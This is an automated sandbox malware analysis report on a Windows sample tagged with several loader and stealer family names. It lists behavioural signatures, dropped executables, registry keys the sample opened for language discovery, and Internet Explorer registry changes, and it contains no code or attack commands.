Malware Analysis Report

2025-08-10 19:52

Sample ID 250703-gmda2afl9y
Target 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop
SHA256 3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e
Tags
discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e

Threat Level: Shows suspicious behavior

The file 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery

Executes dropped EXE

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Gathers network information

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-03 05:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-03 05:54

Reported

2025-07-03 05:57

Platform

win10v2004-20250619-en

Max time kernel

149s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\qljdbvtnlg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_qljdbvtnlg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\qkicavsnlf.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_qkicavsnlf.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfdxvpnifa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kfdxvpnifa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\causmkecxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_causmkecxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\fzxrpkhczu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_fzxrpkhczu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\wrpjhbzurm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_wrpjhbzurm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\rmjecwuomg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_rmjecwuomg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\igbytrljdb.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_igbytrljdb.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\oigaytqljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_oigaytqljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\igaysqlida.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_igaysqlida.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\faysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_faysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\causmkfcxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_causmkfcxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfcxupnhfz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_eywqoigbyt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qkicavsnlf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qkicavsnlf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfdxvpnifa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_causmkecxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\fzxrpkhczu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_wrpjhbzurm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_rmjecwuomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qljdbvtnlg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\igbytrljdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\oigaytqljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_oigaytqljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_causmkfcxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ecwupmhfzx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_bztrljebwu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_igbytrljdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_igaysqlida.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ywqojgbztr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\eywqoigbyt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\sqlidavtnl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_fzxrpkhczu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wrpjhbzurm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\faysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_faysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfcxupnhfz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\yvqoigaytq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\temp\CreateProcess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\causmkecxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\rmjecwuomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\causmkfcxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfcxupnhfz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ecwupmhfzx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ywqojgbztr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\gaysqlidbvtnlfdy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\pnhfaxsqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_pnhfaxsqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qljdbvtnlg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfdxvpnifa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\igaysqlida.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_yvqoigaytq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_sqlidavtnl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\bztrljebwu.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000001ae698d4dc529193fb739ab8579f60fa89deabab4fad6ddd6edeb4f45ce795ed000000000e80000000020000200000002e8ee7a93441166102f27d01a6a7837e7d1296bad16575d9d6b71516b2879f742000000007cbd71f6faab943dd1d2e622521a82759c6c966dd6a94ab8f8addb25db88ef4400000009cd7db07d183aa9b3e4cac3103d21df5e463a728d2abc94814c237dfa751475dea760d43639dc9512a7add064e275d65ad713e3280b7ff7d9640c472c3790186 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002d5f9b32d7ad8579c51ae169a6dc60375a45fb02a867a31606039991b5194a8c000000000e8000000002000020000000cff5908bbb0d5d263fc143d5b81d3f9a3b750b03998948d7dc792cda422e49da100000004f5ed7be25e1a14a723f1fad7efabc3940000000baf41d9eaf9f33413272e4fcfb3ebc202320698ee560753097956d0e9b26d7196de8df76a2a8aa955ce3c4b28ced1df536edb7a80d45743992f5d9bd64779360 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30aa6f17dfebdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4240665B-57D2-11F0-9B6E-C2DCADC1FE9C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "381482518" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301b7217dfebdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287076" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000982d4e763a2bc45f97f3ff8192843bb23c58052dfa046135ca5da319caac0cf6000000000e80000000020000200000008c2d350cd3a022671bc1ce2df317819bae5c8ed478b63743175ae4ba10ff50bf10000000201e76672764b644cd70862453ddcd994000000062a78e5998df3a809e6938956f968b19edb66b27b0a370108d5f45ed0a969ebc128049774748dff5b54055bd7e183618b44c8cbd4a0317cde9ab6f42b0ddd44e C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000007c1347e0c0c896f52b4de36f1193825bc56f040fb55b3213222cadaafd52aac9000000000e8000000002000020000000c8623b68226d9233f7e8207f8c5f580880b08140ddad5c75bf2b165ef73c0cf6200000005bb4925abccb4b758a12d434b5d0e0f6ed363482f1ac340c8e599e21c3611b0040000000e3c6c29f2d77c0a6cac0cc8e04326734e2308c8ab897945a7115fa00dedb1efca733dc353012f7858a69fcc91d03b36b0e7dca0d3e89e20880aaf50d0192657f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d50000000002000000000010660000000100002000000041dc704ab36e0add88a6caf05c00beae80045c9edf226ad742e63e02b95c84d9000000000e8000000002000020000000eb11c7d67b4830c78b40ab93a833ca0b2479fdfe23e4ebe29d0a157b17ae76fa50000000982cd855615be313183460179497121b9259d52587a3b0ad3f78d1330a3c97d708987efafd75fa8287da0edd777eb02234ef8550771703a1d0c1b102c054fc7b5c65da49ea39c5c584708e48966cfff04000000007fdd54d917fb0cf5b7e1e2b1d15bc759400a2abd40d41a46b509daa907ecc1aa49e592a3df0fdc1875ea1c9723f8145126f07c8702750142776748bb2ec604a C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000a137aec44824d0334289144516214a0a1ad2ce35f8393056bdc68bfca86a6823000000000e80000000020000200000006748049c4895b5f563b3ebb2cbe1ede46385bb9831465a8b554241cc7035c32a500000001db58fa578243a002515ca100cc0f97d02a6349642df5dade3304ba277e7bfebb4afd4fc7f7e5d0a687ad9539d4fd1b91b6edfff0a2c68c99ed893d6123112ea552b3393224949380f400afe0018fa554000000001b1fb60c275d032dfc8ee8d4f351ff4646a733fc85d7305f0baf8ac7b8b69056490ff2227a9a768157572616a340c7f81d03d143eba97d63de3633a02609b3b C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
